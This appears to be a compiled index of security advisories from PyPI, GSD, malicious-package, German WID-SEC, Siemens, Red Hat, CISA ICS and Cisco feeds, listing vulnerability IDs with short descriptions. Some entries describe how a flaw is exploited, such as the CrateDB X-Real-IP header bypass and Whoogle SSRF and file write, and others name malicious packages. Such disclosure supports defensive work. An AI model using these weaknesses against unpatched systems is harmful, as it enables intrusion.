| pysec-2024-29 | OctoPrint is a web interface for 3D printer.s OctoPrint versions up until and including 1.9.3 contain a vulnerability that allows malicious admins to change the password of other admin accounts, including their own, without having to repeat their password. An attacker who managed to hijack an admin account might use this to lock out actual admins from their OctoPrint instance. The vulnerability will be patched in version 1.10.0. |
| pysec-2024-28 | An issue was discovered in Django 3.2 before 3.2.24, 4.2 before 4.2.10, and Django 5.0 before 5.0.2. The intcomma template filter was subject to a potential denial-of-service attack when used with very long strings. |
| pysec-2023-252 | Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2. |
| pysec-2024-27 | CrateDB 5.5.1 is contains an authentication bypass vulnerability in the Admin UI component. After configuring password authentication and_ Local_ In the case of an address, identity authentication can be bypassed by setting the X-Real IP request header to a specific value and accessing the Admin UI directly using the default user identity.(https://github.com/crate/crate/issues/15231) |
| pysec-2024-26 | aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. Security-sensitive parts of the Python HTTP parser retained minor differences in allowable character sets, that must trigger error handling to robustly match frame boundaries of proxies in order to protect against injection of additional requests. Additionally, validation could trigger exceptions that were not handled consistently with processing of other malformed input. Being more lenient than internet standards require could, depending on deployment environment, assist in request smuggling. The unhandled exception could cause excessive resource consumption on the application server and/or its logging facilities. This vulnerability exists due to an incomplete fix for CVE-2023-47627. Version 3.9.2 fixes this vulnerability. |
| pysec-2024-25 | DuckDB <=0.9.2 and DuckDB extension-template <=0.9.2 are vulnerable to malicious extension injection via the custom extension feature. |
| pysec-2024-24 | aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present. Disabling follow_symlinks and using a reverse proxy are encouraged mitigations. Version 3.9.2 fixes this issue. |
| pysec-2024-23 | Whoogle Search is a self-hosted metasearch engine. Versions 0.8.3 and prior have a limited file write vulnerability when the configuration options in Whoogle are enabled. The `config` function in `app/routes.py` does not validate the user-controlled `name` variable on line 447 and `config_data` variable on line 437. The `name` variable is insecurely concatenated in `os.path.join`, leading to path manipulation. The POST data from the `config_data` variable is saved with `pickle.dump` which leads to a limited file write. However, the data that is saved is earlier transformed into a dictionary and the `url` key value pair is added before the file is saved on the system. All in all, the issue allows us to save and overwrite files on the system that the application has permissions to, with a dictionary containing arbitrary data and the `url` key value, which is a limited file write. Version 0.8.4 contains a patch for this issue. |
| pysec-2009-11 | The rst parser (parser/text_rst.py) in MoinMoin 1.6.1 does not check the ACL of an included page, which allows attackers to read unauthorized include files via unknown vectors. |
| pysec-2024-22 | TuiTse-TsuSin is a package for organizing the comparative corpus of Taiwanese Chinese characters and Roman characters, and extracting sentences of the Taiwanese Chinese characters and the Roman characters. Prior to version 1.3.2, when using `tuitse_html` without quoting the input, there is a html injection vulnerability. Version 1.3.2 contains a patch for the issue. As a workaround, sanitize Taigi input with HTML quotation. |
| pysec-2024-21 | A vulnerability classified as critical was found in van_der_Schaar LAB TemporAI 0.0.3. Affected by this vulnerability is the function load_from_file of the component PKL File Handler. The manipulation leads to deserialization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252181 was assigned to this vulnerability. NOTE: The vendor was contacted early and confirmed immediately the existence of the issue. A patch is planned to be released in February 2024. |
| pysec-2024-20 | Whoogle Search is a self-hosted metasearch engine. In versions prior to 0.8.4, the `element` method in `app/routes.py` does not validate the user-controlled `src_type` and `element_url` variables and passes them to the `send` method which sends a GET request on lines 339-343 in `request.py`, which leads to a server-side request forgery. This issue allows for crafting GET requests to internal and external resources on behalf of the server. For example, this issue would allow for accessing resources on the internal network that the server has access to, even though these resources may not be accessible on the internet. This issue is fixed in version 0.8.4. |
| ID | Description |
|---|---|
| gsd-2024-33881 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33880 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33879 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33878 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33877 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33876 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33875 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33874 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33873 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33872 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33871 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33870 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33869 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33868 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33867 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33866 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33865 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33864 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33863 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33862 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33861 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33860 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33859 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33858 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33857 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33856 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33855 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33854 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33853 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33852 | The format of the source doesn't require a description, click on the link for more details |
| ID | Description |
|---|---|
| mal-2024-1264 | --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (a6a881b5f34acb08b303ac7f027ae585053ffab51b72cfa79a2bb4b4cbdf3f55) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. |
| mal-2024-1261 | --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (b9bf43d6e49697b8f9e4d87c7cc739e1b31a2db5132fabce880c79cb4d1fd860) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. |
| mal-2024-1260 | --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (d2b1894dd696dfb0e732a29e63d51abc46571ac2e0b0528d22359a070066b65d) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. |
| mal-2024-1265 | --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (55cac2c796a655b4203b015952598ff85be425c2e7b0d0fd4ca5f15da45cb322) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. |
| mal-2024-1263 | --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (5e7792da9bcfb9756c78247a525424f0782b412e24f2479452b818867cc71096) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. |
| mal-2024-1262 | --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (6902c9afc31fa0c3a2b8cc9970a33d7a27356e2171646b06e01e383655efea51) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. |
| mal-2024-1259 | --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (949e41fb87570733314ef5f1c461cb8f7d60ec996c7e12a4df38a36cc03d7b86) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. |
| mal-2024-1258 | --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (28bcce7dcd6942284e70d474af5e6e6343689f9cba20393e07d9bbabf4af5076) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. |
| mal-2024-1256 | --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (a2024bbd933a9c01975b023ff2dd84531dde77e3956d38d5b582374451fa995d) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. |
| mal-2024-1255 | --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (c51728830d7aed5b2134c0a91306e13560b271e8508376b3364616e35473898e) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. |
| mal-2024-1257 | --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (d15650dd9d3ef6040ce65c2e6b3207c96240af179ecbc7061ed5064205df4673) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. |
| mal-2024-1266 | --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (da59ce3066bc4f743fd62c3c5db000f13a21c5167bf5987991697d4b631b6288) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. |
| mal-2024-1254 | --- _-= Per source details. Do not edit below this line.=-_ ## Source: ossf-package-analysis (9d1ba9bc54763d8ec8336f0edc8d5997d5fb080801556f288a4935dac06d4878) The OpenSSF Package Analysis project identified 'reqargs' @ 1.4 (pypi) as malicious. It is considered malicious because: - The package communicates with a domain associated with malicious activity. |
| mal-2024-1206 | --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (7c45841bc7c5a73373ee4764c017a128bb5dd286d34d5d4a2bf649338aa1644a) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. ## Source: ossf-package-analysis (0e4a766d68b4520042016fc0d4d008f37111c842bf3c667daff21680990d840a) The OpenSSF Package Analysis project identified 'f3ngtest12345677' @ 1.0.1 (npm) as malicious. It is considered malicious because: - The package executes one or more commands associated with malicious behavior. |
| mal-2024-1203 | --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (7ecb1d1aad101d1cf5bdd8986e77fa20c75f039412cec1ebe03442f8fec9f939) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. ## Source: ossf-package-analysis (2296335be4a9421627ac02498a5a93323e7687011a2d6e7996e2926065339339) The OpenSSF Package Analysis project identified 'nespresso-bi' @ 199.999.0 (npm) as malicious. It is considered malicious because: - The package communicates with a domain associated with malicious activity. - The package executes one or more commands associated with malicious behavior. |
| mal-2022-7444 | --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (514b0f3bf7aaec1696a74c2c75dbfa0bef1ec45f4f932d67378d25c0c281286d) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. |
| mal-2022-7443 | --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (8bd1bc746628f776e2d199962f3ab978ada0ab996b43c262e1b04aaa0343d7f1) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. |
| mal-2024-1243 | --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (7bd870e9a4b756cffdd1e5cfba86cd8edb34d34c9ca9467057155fc0e9b0d750) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. |
| mal-2024-1240 | --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (a472ad3dc99c2febc88648cf3ccbf6f17c2a254e86c2ffa2e8ed945d25665816) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. |
| mal-2024-1230 | --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (aae1452d962828880783e96a646a0aa0412ecbd05092f5b877b2e531626318be) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. |
| mal-2024-1227 | --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (0283930fe8d814ee74e54a0c5c9840cfb9db19835aeb82c67a360d39407e4132) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. |
| mal-2024-1216 | --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (9f2f1e7f12097a4d36cf205e64bac66845c1b50b491e55e305944d68de0aa299) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. |
| mal-2024-1213 | --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (d95228871b0d604b7e64f4bb155e928331863408ffab79af790ee8353994622b) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. |
| mal-2024-1245 | --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (a7c57b35b6e315e64ebaa3a40ff4cce5807793bf704f35f28a1a299a766d2971) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. |
| mal-2024-1242 | --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (bc4d86a2ccf9f0cabe4c1fad7282ed774c851e0c735abfecc81bdb5779f32f21) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. |
| mal-2024-1239 | --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (c80f02945652dedbbc63973a876fbc73f9aae08b5c6760a072e8e9a994954cf9) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. |
| mal-2024-1233 | --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (48fa3414b1fc4238faa198d07d0f7a8e656a706a83fae508bac516436f6860fc) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. |
| mal-2024-1232 | --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (ac8ddda17313c540b777f7757d4d61d097a7eb003234cc5c4096ee03e5bd7b73) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. |
| mal-2024-1225 | --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (2278ac46e2dcc463150100fdf3e8757f162ae7088ed44798085eb277c8111a6c) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. |
| mal-2024-1224 | --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (4a580421233df7644c976ffb287a35a86664f2926eb6790147cf917fe5ce6065) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. |
| ID | Description |
|---|---|
| wid-sec-w-2024-0773 | Linux Kernel: Mehrere Schwachstellen |
| wid-sec-w-2024-0749 | Linux Kernel: Mehrere Schwachstellen |
| wid-sec-w-2024-0681 | Red Hat Enterprise Linux: Golang-Komponenten-Schwachstelle ermöglicht Denial of Service |
| wid-sec-w-2024-0534 | Linux Kernel: Mehrere Schwachstellen |
| wid-sec-w-2024-0475 | Linux-Kernel: Mehrere Schwachstellen ermöglichen Denial of Service und unspezifische Angriffe |
| wid-sec-w-2024-0473 | Linux Kernel: Mehrere Schwachstellen |
| wid-sec-w-2024-0444 | Linux Kernel: Mehrere Schwachstellen |
| wid-sec-w-2024-0393 | Node.js: Mehrere Schwachstellen |
| wid-sec-w-2024-0346 | Linux Kernel: Schwachstelle ermöglicht Denial of Service |
| wid-sec-w-2024-0126 | EDK2 NetworkPkg IP stack implementation: Mehrere Schwachstellen |
| wid-sec-w-2024-0050 | Insyde UEFI Firmware: Mehrere Schwachstellen ermöglichen Codeausführung |
| wid-sec-w-2023-3174 | SSH Protokoll: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen |
| wid-sec-w-2023-1254 | Linux Kernel (vmwgfx): Mehrere Schwachstellen |
| wid-sec-w-2023-0583 | Apache HTTP Server: Mehrere Schwachstellen ermöglichen HTTP Response Splitting |
| wid-sec-w-2022-2058 | Grub2: Mehrere Schwachstellen |
| wid-sec-w-2022-1664 | Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service |
| wid-sec-w-2022-1374 | Linux Kernel: Mehrere Schwachstellen |
| wid-sec-w-2024-1703 | docker: Schwachstelle ermöglicht Privilegieneskalation |
| wid-sec-w-2024-1702 | IBM InfoSphere Information Server: Schwachstelle ermöglicht Offenlegung von Informationen |
| wid-sec-w-2024-1701 | Aruba EdgeConnect: Mehrere Schwachstellen |
| wid-sec-w-2024-1700 | Internet Systems Consortium BIND: Mehrere Schwachstellen ermöglichen Denial of Service |
| wid-sec-w-2024-1699 | Dell Edge Gateway BIOS: Mehrere Schwachstellen |
| wid-sec-w-2024-1698 | Aruba EdgeConnect: Mehrere Schwachstellen |
| wid-sec-w-2024-1697 | cURL: Mehrere Schwachstellen ermöglichen Denial of Service und Offenlegung von Informationen |
| wid-sec-w-2024-1696 | SolarWinds Platform: Mehrere Schwachstellen |
| wid-sec-w-2024-1695 | Arista EOS: Mehrere Schwachstellen ermöglichen Umgehen von Sicherheitsvorkehrungen |
| wid-sec-w-2024-1694 | Google Chrome: Mehrere Schwachstellen |
| wid-sec-w-2024-1693 | Octopus Deploy: Mehrere Schwachstellen ermöglichen Offenlegung von Informationen |
| wid-sec-w-2024-1692 | Red Hat Enterprise Linux: Mehrere Schwachstellen ermöglichen nicht spezifizierten Angriff |
| wid-sec-w-2024-1683 | Linksys WRT54G Router: Schwachstelle ermöglicht Codeausführung und DoS |
| ID | Description |
|---|---|
| ssa-962515 | SSA-962515: Out of Bounds Read Vulnerability in Industrial Products |
| ssa-953710 | SSA-953710: Vulnerabilities in the Network Communication Stack in Desigo Fire Safety UL and Cerberus PRO UL Fire Protection Systems |
| ssa-935500 | SSA-935500: Denial of Service Vulnerability in FTP Server of Nucleus RTOS based APOGEE, TALON and Desigo PXC/PXM Products |
| ssa-925850 | SSA-925850: Improper Access Control in Polarion ALM |
| ssa-923361 | SSA-923361: MODEL File Parsing Vulnerability in Tecnomatix Plant Simulation before V2302.0011 |
| ssa-916916 | SSA-916916: Security Vulnerabilities Fixed in RUGGEDCOM CROSSBOW V5.5 |
| ssa-871717 | SSA-871717: Multiple Vulnerabilities in Polarion ALM |
| ssa-712929 | SSA-712929: Denial of Service Vulnerability in OpenSSL (CVE-2022-0778) Affecting Industrial Products |
| ssa-691715 | SSA-691715: Vulnerability in OPC Foundation Local Discovery Server Affecting Siemens Products |
| ssa-665034 | SSA-665034: Vulnerability in Nozomi Guardian/CMC before 23.3.0 on RUGGEDCOM APE1808 devices |
| ssa-661579 | SSA-661579: Multiple File Parsing Vulnerabilities in Teamcenter Visualization and JT2Go |
| ssa-647455 | SSA-647455: Multiple Vulnerabilities in Nozomi Guardian/CMC before 22.6.2 on RUGGEDCOM APE1808 devices |
| ssa-593272 | SSA-593272: SegmentSmack in Interniche IP-Stack based Industrial Devices |
| ssa-592380 | SSA-592380: Denial of Service Vulnerability in SIMATIC S7-1500 CPUs and related products |
| ssa-589937 | SSA-589937: Multiple Memory Corruption Vulnerabilities in Solid Edge |
| ssa-552874 | SSA-552874: Denial of Service Vulnerability in SIPROTEC 5 Devices |
| ssa-489698 | SSA-489698: X_T File Parsing Vulnerability in Parasolid |
| ssa-455250 | SSA-455250: Multiple Vulnerabilities in Palo Alto Networks Virtual NGFW on RUGGEDCOM APE1808 devices |
| ssa-382651 | SSA-382651: File Parsing Vulnerability in Solid Edge |
| ssa-322980 | SSA-322980: Denial of Service Vulnerability in SIPROTEC 5 Devices |
| ssa-292063 | SSA-292063: Multiple Vulnerabilities in Nozomi Guardian/CMC before 22.6.3 and 23.1.0 on RUGGEDCOM APE1808 devices |
| ssa-292022 | SSA-292022: Vulnerability in Nozomi Guardian/CMC before 23.4.1 on RUGGEDCOM APE1808 devices |
| ssa-273900 | SSA-273900: Multiple Vulnerabilities in SIMATIC CN 4100 before V3.0 |
| ssa-265688 | SSA-265688: Vulnerabilities in the additional GNU/Linux subsystem of the SIMATIC S7-1500 TM MFP V1.1 |
| ssa-258494 | SSA-258494: Stack Overflow Vulnerability in Simcenter Nastran before 2406.90 |
| ssa-240541 | SSA-240541: WIBU Systems CodeMeter Heap Buffer Overflow Vulnerability in Industrial Products |
| ssa-225840 | SSA-225840: Vulnerabilities in the Network Communication Stack in Sinteso EN and Cerberus PRO EN Fire Protection Systems |
| ssa-148641 | SSA-148641: XPath Constraint Vulnerability in Mendix Runtime |
| ssa-046364 | SSA-046364: X_T File Parsing Vulnerabilities in Parasolid |
| ssa-750274 | SSA-750274: Impact of CVE-2024-3400 on RUGGEDCOM APE1808 devices configured with Palo Alto Networks Virtual NGFW |
| ID | Description |
|---|---|
| rhba-2023_0568 | Red Hat Bug Fix Advisory: OpenShift Container Platform 4.12.2 packages update |
| rhba-2023_2181 | Red Hat Bug Fix Advisory: delve, golang, and go-toolset bug fix and enhancement update |
| rhba-2023_1750 | Red Hat Bug Fix Advisory: OpenShift Container Platform 4.12.13 bug fix update |
| rhba-2024_0928 | Red Hat Bug Fix Advisory: MTV 2.5.5 Images |
| rhba-2023_3611 | Red Hat Bug Fix Advisory: Release of Bug Advisories for the OpenShift Jenkins and Jenkins agent base image |
| rhsa-2024_4677 | Red Hat Security Advisory: OpenShift Container Platform 4.12.61 bug fix and security update |
| rhsa-2024_4336 | Red Hat Security Advisory: security update Logging for Red Hat OpenShift - 5.6.21 |
| rhsa-2024_4744 | Red Hat Security Advisory: resource-agents update |
| rhsa-2024_4730 | Red Hat Security Advisory: fence-agents update |
| rhsa-2024_4746 | Red Hat Security Advisory: fence-agents update |
| rhsa-2024_4613 | Red Hat Security Advisory: OpenShift Container Platform 4.16.4 bug fix and security update |
| rhsa-2024_4616 | Red Hat Security Advisory: OpenShift Container Platform 4.16.4 packages and security update |
| rhsa-2024_4830 | Red Hat Security Advisory: httpd:2.4 security update |
| rhsa-2024_4836 | Red Hat Security Advisory: RHACS 4.5 enhancement and security update |
| rhsa-2024_4831 | Red Hat Security Advisory: kernel-rt security update |
| rhba-2024_1440 | Red Hat Bug Fix Advisory: MTV 2.5.6 Images |
| rhsa-2024_4820 | Red Hat Security Advisory: httpd:2.4 security update |
| rhsa-2024_4829 | Red Hat Security Advisory: freeradius:3.0 security update |
| rhsa-2024_4828 | Red Hat Security Advisory: freeradius security update |
| rhba-2019_2819 | Red Hat Bug Fix Advisory: OpenShift Container Platform 4.1.17 packages update |
| rhsa-2024_4826 | Red Hat Security Advisory: freeradius:3.0 security update |
| rhba-2019_3139 | Red Hat Bug Fix Advisory: OpenShift Container Platform 3.11 bug fix and enhancement update |
| rhsa-2024_4827 | Red Hat Security Advisory: httpd:2.4 security update |
| rhsa-2024_4825 | Red Hat Security Advisory: podman security update |
| rhba-2020_0496 | Red Hat Bug Fix Advisory: Satellite 6.6.2 Async Bug Fix Update |
| rhsa-2024_4823 | Red Hat Security Advisory: kernel security update |
| rhsa-2024_4715 | Red Hat Security Advisory: cups security update |
| rhsa-2024_4824 | Red Hat Security Advisory: nodejs:18 security update |
| rhba-2023_6928 | Red Hat Bug Fix Advisory: go-toolset:rhel8 bug fix and enhancement update |
| rhba-2023_6364 | Red Hat Bug Fix Advisory: golang and delve bug fix and enhancement update |
| ID | Description |
|---|---|
| icsa-24-165-01 | Siemens Mendix Applications |
| icsa-24-158-04 | Johnson Controls Software House iStar Pro Door Controller |
| icsa-24-158-03 | Mitsubishi Electric CC-Link IE TSN Industrial Managed Switch |
| icsa-24-158-02 | Emerson Ovation |
| icsa-24-158-01 | Emerson PACSystem and Fanuc |
| icsa-24-156-01 | Uniview NVR301-04S2-P4 |
| icsa-24-151-02 | Fuji Electric Monitouch V-SFT (Update A) |
| icsa-23-278-03 | Mitsubishi Electric CC-Link IE TSN Industrial Managed Switch (Update A) |
| icsma-24-151-02 | Baxter Welch Allyn Connex Spot Monitor |
| icsma-24-151-01 | Baxter Welch Allyn Configuration Tool |
| icsa-24-151-04 | Westermo EDW-100 |
| icsa-24-151-03 | Inosoft VisiWin |
| icsa-24-151-01 | LenelS2 NetBox |
| icsa-22-356-03 | Mitsubishi Electric MELSEC iQ-R, iQ-L Series and MELIPC Series (Update C) |
| icsa-22-172-01 | Mitsubishi Electric MELSEC iQ-R, Q, L Series and MELIPC Series (Update C) |
| icsa-24-149-01 | Campbell Scientific CSI Web Server |
| icsa-24-144-01 | AutomationDirect Productivity PLCs |
| icsa-24-142-01 | LCDS LAquis SCADA |
| icsma-20-049-02 | GE Healthcare Ultrasound products (Update A) |
| icsa-24-137-14 | Rockwell Automation FactoryTalk View SE |
| icsa-24-044-01 | Mitsubishi Electric MELSEC iQ-R Series Safety CPU and SIL2 Process CPU (Update A) |
| icsa-24-135-04 | Mitsubishi Electric Multiple FA Engineering Software Products |
| icsa-24-135-03 | Johnson Controls Software House C-CURE 9000 |
| icsa-24-135-02 | SUBNET PowerSYSTEM Center |
| icsa-24-135-01 | Rockwell Automation FactoryTalk Remote Access |
| icsa-24-137-13 | Siemens Industrial Products |
| icsa-24-137-12 | Siemens Desigo Fire Safety UL and Cerberus PRO UL Fire Protection Systems |
| icsa-24-137-11 | Siemens RUGGEDCOM APE1808 |
| icsa-24-137-10 | Siemens RUGGEDCOM CROSSBOW |
| icsa-24-137-09 | Siemens Solid Edge |
| ID | Description |
|---|---|
| cisco-sa-sb-wap-multi-85g83crb | Cisco Small Business 100, 300, and 500 Series Wireless Access Points Command Injection and Buffer Overflow Vulnerabilities |
| cisco-sa-duo-win-bypass-pn42kkbm | Cisco Duo Authentication for Windows Logon and RDP Authentication Bypass Vulnerability |
| cisco-sa-appd-xss-3jwqsmnt | Cisco AppDynamics Controller Cross-Site Scripting Vulnerability |
| cisco-sa-appd-traversal-m7n8mzpf | Cisco AppDynamics Controller Path Traversal Vulnerability |
| cisco-sa-curl-libcurl-d9ds39cv | cURL and libcurl Vulnerability Affecting Cisco Products: October 2023 |
| cisco-sa-ucsfi-imm-syn-p6kztdqc | Cisco UCS 6400 and 6500 Series Fabric Interconnects Intersight Managed Mode Denial of Service Vulnerability |
| cisco-sa-nxos-po-acl-tkyepgvl | Cisco Nexus 3000 and 9000 Series Switches Port Channel ACL Programming Vulnerability |
| cisco-sa-nxos-lldp-dos-z7pnctgt | Cisco FXOS and NX-OS Software Link Layer Discovery Protocol Denial of Service Vulnerability |
